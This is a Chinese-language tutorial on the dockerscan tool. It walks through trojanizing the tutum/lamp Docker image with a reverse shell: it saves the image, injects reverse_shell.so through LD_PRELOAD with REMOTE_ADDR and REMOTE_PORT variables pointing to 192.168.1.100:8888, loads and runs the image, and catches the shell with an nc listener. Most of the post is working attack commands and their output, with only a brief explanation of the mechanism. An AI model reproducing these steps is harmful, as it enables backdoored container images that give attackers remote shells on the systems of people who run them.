一款Docker攻击工具dockerscan

0x00前言

最近关注Docker安全,发现一个Docker security analysis & hacking tools-dockerscan

0x01简单实践

1.下载tutum/lamp

1
docker pull tutum/lamp

2.导出docker镜像为文件

1
docker save tutum/lamp -o tutum_lamp

3.简单分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
# 输入命令
dockerscan image info tutum_lamp
# 输出结果如下
[ * ] Starting analyzing docker image...
[ * ] Selected image: 'tutum_lamp'
[ * ] Analysis finished. Results:
[ * ] - Docker version = 1.9.1
[ * ] - Created date = 2016-02-15T10:35:01.761164611Z
[ * ] - Host name = dfc2eabdf236
[ * ] - Exposed ports:
[ * ] > 3306:
[ * ] + tcp
[ * ] > 80:
[ * ] + tcp
[ * ] - Author = Fernando Mayo , Feng Honglin
[ * ] - Cmd = /run.sh
[ * ] - Environment:
[ * ] > PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
[ * ] > DEBIAN_FRONTEND=noninteractive
[ * ] > PHP_UPLOAD_MAX_FILESIZE=10M
[ * ] > PHP_POST_MAX_SIZE=10M

4.修改镜像,添加trojanize反弹shell

1
2
3
4
5
6
7
8
9
10
# 输入命令
dockerscan image modify trojanize -l 192.168.1.100 -p 8888 tutum_lamp -o tutum_lamp_modify_trojanize
# 输出结果如下
[ * ] Starting analyzing docker image...
[ * ] Selected image: 'tutum_lamp'
[ * ] Image troyanized successful
[ * ] Trojanized image location:
[ * ] > /home/ubuntu/dockerscan/tutum_lamp_modify_trojanize.tar
[ * ] To receive the reverse shell, only write:
[ * ] > nc -v -k -l 192.168.1.100 8888

5.导入新的镜像并运行

1
2
3
# 输入命令
docker load -i tutum_lamp_modify_trojanize.tar
docker run -d tutum/lamp

5.控制端监听,获取权限,执行命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
# 输入命令
ubuntu@VM-234-6-ubuntu:~$ nc -lvk 8888
# 输出结果如下
Listening on [0.0.0.0] (family 0, port 8888)
Connection from [192.168.1.100] port 8888 [tcp/*] accepted (family 2, sport 48152)
connecting people
ls
app
bin
boot
create_mysql_admin_user.sh
dev
etc
home
lib
lib64
media
mnt
opt
proc
root
run
run.sh
sbin
srv
start-apache2.sh
start-mysqld.sh
sys
tmp
usr
var

6.再次分析添加trojanize反弹shell后的镜像信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
dockerscan image info tutum_lamp_modify_trojanize.tar
# 输出结果如下
[ * ] Starting analyzing docker image...
[ * ] Selected image: 'tutum_lamp_modify_trojanize.tar'
[ * ] Analysis finished. Results:
[ * ] - Created date = 2016-02-15T10:35:01.761164611Z
[ * ] - Author = Fernando Mayo , Feng Honglin
[ * ] - Cmd = /run.sh
[ * ] - Docker version = 1.9.1
[ * ] - Host name = dfc2eabdf236
[ * ] - Environment:
[ * ] > PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
[ * ] > DEBIAN_FRONTEND=noninteractive
[ * ] > PHP_UPLOAD_MAX_FILESIZE=10M
[ * ] > PHP_POST_MAX_SIZE=10M
[ * ] > REMOTE_ADDR=192.168.1.100
[ * ] > REMOTE_PORT=8888
[ * ] > LD_PRELOAD=/usr/share/lib/reverse_shell.so
[ * ] - Exposed ports:
[ * ] > 80:
[ * ] + tcp
[ * ] > 3306:
[ * ] + tcp

0x02原理小结

1.修改镜像内容copy reverse_shell.so文件到/usr/share/lib/reverse_shell.so,
2.添加环境变量REMOTE_ADDR=192.168.1.100,REMOTE_PORT=8888,LD_PRELOAD=/usr/share/lib/reverse_shell.so
3.利用LD_PRELOAD预先加载在每次允许docker镜像时反弹shell回来。